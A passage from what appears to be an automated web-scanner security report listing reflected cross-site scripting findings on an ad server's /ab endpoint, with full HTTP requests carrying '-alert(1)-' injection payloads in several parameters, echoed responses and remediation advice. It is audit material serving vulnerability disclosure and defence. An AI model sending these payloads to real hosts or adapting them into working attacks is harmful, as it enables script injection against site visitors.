Accept: */*
Referer: http://www.goal.com/en/news/9/england/2011/10/01/2691360/anderson-confident-manchester-united-will-keep-unbeaten-run
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ITXTCtxtHistOff=1

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Content-Type: application/x-javascript;charset=iso-8859-1
Vary: Accept-Encoding
Content-Length: 7490
Date: Mon, 03 Oct 2011 00:03:04 GMT
Age: 0
Connection: keep-alive

var undefined;if(null==$iTXT.glob.dbParams||undefined==$iTXT.glob.dbParams){$iTXT.glob.dbParams=new $iTXT.data.Param(undefined,undefined,undefined,'DATABASE');}$iTXT.glob.dbParams.set({"searchengine.h
...[SNIP]...
17560,"jscallback":"$iTXT.js.callback0","reg":"--","refurl":"http://www.goal.com/en/news/9/england/2011/10/01/2691360/anderson-confident-manchester-united-will-keep-unbeaten-run","rcc":"--","cc":"us","75336"-alert(1)-"a0600fbcc40":"1"},null,60);var undefined;if(null==$iTXT.glob.params||undefined==$iTXT.glob.params){$iTXT.glob.params=new $iTXT.data.Param($iTXT.glob.dbgParams,undefined,undefined,'CHANNEL');}$iTXT.glob.params.set
...[SNIP]...

4.68. http://ib.adnxs.com/ab [ccd parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ab

Issue detail

The value of the ccd request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 971ff'-alert(1)-'79037dbfcc8 was submitted in the ccd parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ab?enc=q5uLv-0J1z9oWii6qmPUPwAAAGBmZvY_aFoouqpj1D-qm4u_7QnXPxv3XqCB24t0cEeI8W8QIlnC-IhOAAAAAE1ECABlAQAAbAEAAAIAAACyGQkAPWQAAAEAAABVU0QAVVNEANgCWgD8AdsEbBEBAgUCAQQAAAAAniXlYwAAAAA.&tt_code=goal.com&udj=uf%28%27a%27%2C+1008%2C+1317599426%29%3Buf%28%27c%27%2C+117682%2C+1317599426%29%3Buf%28%27g%27%2C+51717%2C+1317599426%29%3Buf%28%27r%27%2C+596402%2C+1317599426%29%3Bppv%2815221%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3Bppv%2815223%2C+%278398047279950264091%27%2C+1317599426%2C+1317685826%2C+117682%2C+25661%2C+0%29%3Bppv%2815225%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3Bppv%2815227%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3Bppv%2815229%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3Bppv%2815231%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3B&cnd=!xCOKHwiylwcQsrMkGAAgvcgBMAA4_ANAAEjsAlAAWABgeGgAcAB4AIABAIgBAJABAZgBAaABAagBA7ABALkBxSCwcmiRzT_BAVgGUQHvCdc_yQGamZmZmZnxP9kBf_s6cM6I5D_gAdQv&ccd=!sAQDJgiylwcQsrMkGL3IASAA971ff'-alert(1)-'79037dbfcc8&referrer=http://www.goal.com&media_subtypes=1&pp=AAABMscLuNXWwtw0Z865RCwSLWzLJFnAyLYkYA&pubclick=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLuQ0CQQwF0L9cGmnbILXktedyQAsU4TkkQiogpa5tglYIES9_KxYA18hqI1elPlul2FjIRBt55OzszqIl4HB_f_cVx__w5KOrCHGPk2bNTDMNo20zLlWs9JwCTkC5BZyxfF4BF-D5wA90U0FEcwAAAA%3D%3D%26dst%3D HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIrIsBEAoYASABKAEwwfGD8wQQwfGD8wQYAA..; anj=Kfu=8fG5EfE:3F.0s]#%2L_'x%SEV/i#-?R!z6Ut0QkM9e5'Qr*vP.V*lpYBPp[Bs3dBED7@8!MMT@<SGb]bp@OWFe]M3^!WeuSpp!<tk0xzCgSDb'W7Qc:sp!-ewEI]-`k1+Uxk1GOGkI/$_.v=_!`4hTmV3oY`#EoW=LnXT`HX)Ny^rF?u'>@*e?CDQ!(G@]1BW0Q<EQU#3!ZR*?l7/tm%40RO-2NpM_ZlEy!<e/e+ztxA; uuid2=-1

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
Set-Cookie: uuid2=-1; path=/; expires=Sun, 19-Sep-2021 23:53:49 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Content-Type: text/javascript
Date: Sun, 02 Oct 2011 23:53:49 GMT
Content-Length: 1710

document.write('<iframe frameborder="0" width="728" height="90" marginheight="0" marginwidth="0" target="_blank" scrolling="no" src="http://ib.adnxs.com/if?enc=znuEnuzW1T-HFtnO91PTPwAAAGBmZvY_aFoouqpj
...[SNIP]...
17682%2C+25661%2C+0%29%3B&cnd=!xCOKHwiylwcQsrMkGAAgvcgBMAA4_ANAAEjsAlAAWABgeGgAcAB4AIABAIgBAJABAZgBAaABAagBA7ABALkBxSCwcmiRzT_BAVgGUQHvCdc_yQGamZmZmZnxP9kBf_s6cM6I5D_gAdQv&ccd=!sAQDJgiylwcQsrMkGL3IASAA971ff'-alert(1)-'79037dbfcc8&referrer=http://www.goal.com&media_subtypes=1">
...[SNIP]...

4.69. http://ib.adnxs.com/ab [cnd parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ab

Issue detail

The value of the cnd request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e30d8'-alert(1)-'5040089bc5a was submitted in the cnd parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ab?enc=q5uLv-0J1z9oWii6qmPUPwAAAGBmZvY_aFoouqpj1D-qm4u_7QnXPxv3XqCB24t0cEeI8W8QIlnC-IhOAAAAAE1ECABlAQAAbAEAAAIAAACyGQkAPWQAAAEAAABVU0QAVVNEANgCWgD8AdsEbBEBAgUCAQQAAAAAniXlYwAAAAA.&tt_code=goal.com&udj=uf%28%27a%27%2C+1008%2C+1317599426%29%3Buf%28%27c%27%2C+117682%2C+1317599426%29%3Buf%28%27g%27%2C+51717%2C+1317599426%29%3Buf%28%27r%27%2C+596402%2C+1317599426%29%3Bppv%2815221%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3Bppv%2815223%2C+%278398047279950264091%27%2C+1317599426%2C+1317685826%2C+117682%2C+25661%2C+0%29%3Bppv%2815225%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3Bppv%2815227%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3Bppv%2815229%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3Bppv%2815231%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3B&cnd=!xCOKHwiylwcQsrMkGAAgvcgBMAA4_ANAAEjsAlAAWABgeGgAcAB4AIABAIgBAJABAZgBAaABAagBA7ABALkBxSCwcmiRzT_BAVgGUQHvCdc_yQGamZmZmZnxP9kBf_s6cM6I5D_gAdQve30d8'-alert(1)-'5040089bc5a&ccd=!sAQDJgiylwcQsrMkGL3IASAA&referrer=http://www.goal.com&media_subtypes=1&pp=AAABMscLuNXWwtw0Z865RCwSLWzLJFnAyLYkYA&pubclick=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLuQ0CQQwF0L9cGmnbILXktedyQAsU4TkkQiogpa5tglYIES9_KxYA18hqI1elPlul2FjIRBt55OzszqIl4HB_f_cVx__w5KOrCHGPk2bNTDMNo20zLlWs9JwCTkC5BZyxfF4BF-D5wA90U0FEcwAAAA%3D%3D%26dst%3D HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIrIsBEAoYASABKAEwwfGD8wQQwfGD8wQYAA..; anj=Kfu=8fG5EfE:3F.0s]#%2L_'x%SEV/i#-?R!z6Ut0QkM9e5'Qr*vP.V*lpYBPp[Bs3dBED7@8!MMT@<SGb]bp@OWFe]M3^!WeuSpp!<tk0xzCgSDb'W7Qc:sp!-ewEI]-`k1+Uxk1GOGkI/$_.v=_!`4hTmV3oY`#EoW=LnXT`HX)Ny^rF?u'>@*e?CDQ!(G@]1BW0Q<EQU#3!ZR*?l7/tm%40RO-2NpM_ZlEy!<e/e+ztxA; uuid2=-1

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
Set-Cookie: uuid2=-1; path=/; expires=Sun, 19-Sep-2021 23:53:36 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Content-Type: text/javascript
Date: Sun, 02 Oct 2011 23:53:36 GMT
Content-Length: 1707

document.write('<iframe frameborder="0" width="728" height="90" marginheight="0" marginwidth="0" target="_blank" scrolling="no" src="http://ib.adnxs.com/if?enc=znuEnuzW1T-HFtnO91PTPwAAAGBmZvY_aFoouqpj
...[SNIP]...
+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3B&cnd=!xCOKHwiylwcQsrMkGAAgvcgBMAA4_ANAAEjsAlAAWABgeGgAcAB4AIABAIgBAJABAZgBAaABAagBA7ABALkBxSCwcmiRzT_BAVgGUQHvCdc_yQGamZmZmZnxP9kBf_s6cM6I5D_gAdQve30d8'-alert(1)-'5040089bc5a&ccd=!sAQDJgiylwcQsrMkGL3IASAA&referrer=http://www.goal.com&media_subtypes=1">
...[SNIP]...

4.70. http://ib.adnxs.com/ab [referrer parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ab

Issue detail

The value of the referrer request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 67532'-alert(1)-'10502941372 was submitted in the referrer parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ab?enc=q5uLv-0J1z9oWii6qmPUPwAAAGBmZvY_aFoouqpj1D-qm4u_7QnXPxv3XqCB24t0cEeI8W8QIlnC-IhOAAAAAE1ECABlAQAAbAEAAAIAAACyGQkAPWQAAAEAAABVU0QAVVNEANgCWgD8AdsEbBEBAgUCAQQAAAAAniXlYwAAAAA.&tt_code=goal.com&udj=uf%28%27a%27%2C+1008%2C+1317599426%29%3Buf%28%27c%27%2C+117682%2C+1317599426%29%3Buf%28%27g%27%2C+51717%2C+1317599426%29%3Buf%28%27r%27%2C+596402%2C+1317599426%29%3Bppv%2815221%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3Bppv%2815223%2C+%278398047279950264091%27%2C+1317599426%2C+1317685826%2C+117682%2C+25661%2C+0%29%3Bppv%2815225%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3Bppv%2815227%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3Bppv%2815229%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3Bppv%2815231%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3B&cnd=!xCOKHwiylwcQsrMkGAAgvcgBMAA4_ANAAEjsAlAAWABgeGgAcAB4AIABAIgBAJABAZgBAaABAagBA7ABALkBxSCwcmiRzT_BAVgGUQHvCdc_yQGamZmZmZnxP9kBf_s6cM6I5D_gAdQv&ccd=!sAQDJgiylwcQsrMkGL3IASAA&referrer=http://www.goal.com67532'-alert(1)-'10502941372&media_subtypes=1&pp=AAABMscLuNXWwtw0Z865RCwSLWzLJFnAyLYkYA&pubclick=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLuQ0CQQwF0L9cGmnbILXktedyQAsU4TkkQiogpa5tglYIES9_KxYA18hqI1elPlul2FjIRBt55OzszqIl4HB_f_cVx__w5KOrCHGPk2bNTDMNo20zLlWs9JwCTkC5BZyxfF4BF-D5wA90U0FEcwAAAA%3D%3D%26dst%3D HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIrIsBEAoYASABKAEwwfGD8wQQwfGD8wQYAA..; anj=Kfu=8fG5EfE:3F.0s]#%2L_'x%SEV/i#-?R!z6Ut0QkM9e5'Qr*vP.V*lpYBPp[Bs3dBED7@8!MMT@<SGb]bp@OWFe]M3^!WeuSpp!<tk0xzCgSDb'W7Qc:sp!-ewEI]-`k1+Uxk1GOGkI/$_.v=_!`4hTmV3oY`#EoW=LnXT`HX)Ny^rF?u'>@*e?CDQ!(G@]1BW0Q<EQU#3!ZR*?l7/tm%40RO-2NpM_ZlEy!<e/e+ztxA; uuid2=-1

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
Set-Cookie: uuid2=-1; path=/; expires=Sun, 19-Sep-2021 23:54:03 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Content-Type: text/javascript
Date: Sun, 02 Oct 2011 23:54:03 GMT
Content-Length: 1710

document.write('<iframe frameborder="0" width="728" height="90" marginheight="0" marginwidth="0" target="_blank" scrolling="no" src="http://ib.adnxs.com/if?enc=znuEnuzW1T-HFtnO91PTPwAAAGBmZvY_aFoouqpj
...[SNIP]...
=!xCOKHwiylwcQsrMkGAAgvcgBMAA4_ANAAEjsAlAAWABgeGgAcAB4AIABAIgBAJABAZgBAaABAagBA7ABALkBxSCwcmiRzT_BAVgGUQHvCdc_yQGamZmZmZnxP9kBf_s6cM6I5D_gAdQv&ccd=!sAQDJgiylwcQsrMkGL3IASAA&referrer=http://www.goal.com67532'-alert(1)-'10502941372&media_subtypes=1">
...[SNIP]...

4.71. http://ib.adnxs.com/ab [tt_code parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ab

Issue detail

The value of the tt_code request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1d69e'-alert(1)-'14515927802 was submitted in the tt_code parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ab?enc=q5uLv-0J1z9oWii6qmPUPwAAAGBmZvY_aFoouqpj1D-qm4u_7QnXPxv3XqCB24t0cEeI8W8QIlnC-IhOAAAAAE1ECABlAQAAbAEAAAIAAACyGQkAPWQAAAEAAABVU0QAVVNEANgCWgD8AdsEbBEBAgUCAQQAAAAAniXlYwAAAAA.&tt_code=goal.com1d69e'-alert(1)-'14515927802&udj=uf%28%27a%27%2C+1008%2C+1317599426%29%3Buf%28%27c%27%2C+117682%2C+1317599426%29%3Buf%28%27g%27%2C+51717%2C+1317599426%29%3Buf%28%27r%27%2C+596402%2C+1317599426%29%3Bppv%2815221%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3Bppv%2815223%2C+%278398047279950264091%27%2C+1317599426%2C+1317685826%2C+117682%2C+25661%2C+0%29%3Bppv%2815225%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3Bppv%2815227%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3Bppv%2815229%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3Bppv%2815231%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3B&cnd=!xCOKHwiylwcQsrMkGAAgvcgBMAA4_ANAAEjsAlAAWABgeGgAcAB4AIABAIgBAJABAZgBAaABAagBA7ABALkBxSCwcmiRzT_BAVgGUQHvCdc_yQGamZmZmZnxP9kBf_s6cM6I5D_gAdQv&ccd=!sAQDJgiylwcQsrMkGL3IASAA&referrer=http://www.goal.com&media_subtypes=1&pp=AAABMscLuNXWwtw0Z865RCwSLWzLJFnAyLYkYA&pubclick=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLuQ0CQQwF0L9cGmnbILXktedyQAsU4TkkQiogpa5tglYIES9_KxYA18hqI1elPlul2FjIRBt55OzszqIl4HB_f_cVx__w5KOrCHGPk2bNTDMNo20zLlWs9JwCTkC5BZyxfF4BF-D5wA90U0FEcwAAAA%3D%3D%26dst%3D HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIrIsBEAoYASABKAEwwfGD8wQQwfGD8wQYAA..; anj=Kfu=8fG5EfE:3F.0s]#%2L_'x%SEV/i#-?R!z6Ut0QkM9e5'Qr*vP.V*lpYBPp[Bs3dBED7@8!MMT@<SGb]bp@OWFe]M3^!WeuSpp!<tk0xzCgSDb'W7Qc:sp!-ewEI]-`k1+Uxk1GOGkI/$_.v=_!`4hTmV3oY`#EoW=LnXT`HX)Ny^rF?u'>@*e?CDQ!(G@]1BW0Q<EQU#3!ZR*?l7/tm%40RO-2NpM_ZlEy!<e/e+ztxA; uuid2=-1

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
Set-Cookie: uuid2=-1; path=/; expires=Sun, 19-Sep-2021 23:53:04 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Content-Type: text/javascript
Date: Sun, 02 Oct 2011 23:53:04 GMT
Content-Length: 1811

document.write('<iframe frameborder="0" width="728" height="90" marginheight="0" marginwidth="0" target="_blank" scrolling="no" src="http://ib.adnxs.com/if?enc=znuEnuzW1T-HFtnO91PTPwAAAGBmZvY_aFoouqpj
...[SNIP]...
%3DH4sIAAAAAAAAABXLuQ0CQQwF0L9cGmnbILXktedyQAsU4TkkQiogpa5tglYIES9_KxYA18hqI1elPlul2FjIRBt55OzszqIl4HB_f_cVx__w5KOrCHGPk2bNTDMNo20zLlWs9JwCTkC5BZyxfF4BF-D5wA90U0FEcwAAAA%3D%3D%26dst%3D&tt_code=goal.com1d69e'-alert(1)-'14515927802&udj=uf%28%27a%27%2C+1008%2C+1317599426%29%3Buf%28%27c%27%2C+117682%2C+1317599426%29%3Buf%28%27g%27%2C+51717%2C+1317599426%29